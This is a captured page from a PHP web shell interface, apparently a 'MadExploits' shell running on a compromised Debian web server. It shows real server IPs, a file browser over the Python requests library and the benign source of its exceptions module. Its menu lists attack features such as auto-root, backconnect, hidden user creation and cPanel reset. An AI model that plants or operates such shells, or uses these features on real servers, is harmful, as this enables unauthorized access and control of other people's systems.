Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 3.17.73.81
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
dist-packages /
requests /
[ HOME SHELL ]
Name
Size
Permission
Action
packages
[ DIR ]
drwxr-xr-x
__init__.py
2.51
KB
-rw-r--r--
__init__.pyc
3.04
KB
-rw-r--r--
adapters.py
15.76
KB
-rw-r--r--
adapters.pyc
14.85
KB
-rw-r--r--
api.py
4.61
KB
-rw-r--r--
api.pyc
5.51
KB
-rw-r--r--
auth.py
6.03
KB
-rw-r--r--
auth.pyc
7.01
KB
-rw-r--r--
cacert.pem
301.21
KB
-rw-r--r--
certs.py
602
B
-rw-r--r--
certs.pyc
820
B
-rw-r--r--
compat.py
2.59
KB
-rw-r--r--
compat.pyc
2.5
KB
-rw-r--r--
cookies.py
16.29
KB
-rw-r--r--
cookies.pyc
19.69
KB
-rw-r--r--
exceptions.py
2.37
KB
-rw-r--r--
exceptions.pyc
4.93
KB
-rw-r--r--
hooks.py
820
B
-rw-r--r--
hooks.pyc
1.03
KB
-rw-r--r--
models.py
27.17
KB
-rw-r--r--
models.pyc
24.08
KB
-rw-r--r--
sessions.py
23.22
KB
-rw-r--r--
sessions.pyc
19.15
KB
-rw-r--r--
status_codes.py
3.13
KB
-rw-r--r--
status_codes.pyc
4.36
KB
-rw-r--r--
structures.py
2.91
KB
-rw-r--r--
structures.pyc
5.02
KB
-rw-r--r--
utils.py
19.85
KB
-rw-r--r--
utils.pyc
19.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : exceptions.py
# -*- coding: utf-8 -*- """ requests.exceptions ~~~~~~~~~~~~~~~~~~~ This module contains the set of Requests' exceptions. """ from urllib3.exceptions import HTTPError as BaseHTTPError class RequestException(IOError): """There was an ambiguous exception that occurred while handling your request.""" def __init__(self, *args, **kwargs): """ Initialize RequestException with `request` and `response` objects. """ response = kwargs.pop('response', None) self.response = response self.request = kwargs.pop('request', None) if (response is not None and not self.request and hasattr(response, 'request')): self.request = self.response.request super(RequestException, self).__init__(*args, **kwargs) class HTTPError(RequestException): """An HTTP error occurred.""" class ConnectionError(RequestException): """A Connection error occurred.""" class ProxyError(ConnectionError): """A proxy error occurred.""" class SSLError(ConnectionError): """An SSL error occurred.""" class Timeout(RequestException): """The request timed out. Catching this error will catch both :exc:`~requests.exceptions.ConnectTimeout` and :exc:`~requests.exceptions.ReadTimeout` errors. """ class ConnectTimeout(ConnectionError, Timeout): """The request timed out while trying to connect to the remote server. Requests that produced this error are safe to retry. """ class ReadTimeout(Timeout): """The server did not send any data in the allotted amount of time.""" class URLRequired(RequestException): """A valid URL is required to make a request.""" class TooManyRedirects(RequestException): """Too many redirects.""" class MissingSchema(RequestException, ValueError): """The URL schema (e.g. http or https) is missing.""" class InvalidSchema(RequestException, ValueError): """See defaults.py for valid schemas.""" class InvalidURL(RequestException, ValueError): """ The URL provided was somehow invalid. """ class ChunkedEncodingError(RequestException): """The server declared chunked encoding but sent an invalid chunk.""" class ContentDecodingError(RequestException, BaseHTTPError): """Failed to decode response content""" class StreamConsumedError(RequestException, TypeError): """The content for this response was already consumed"""
Close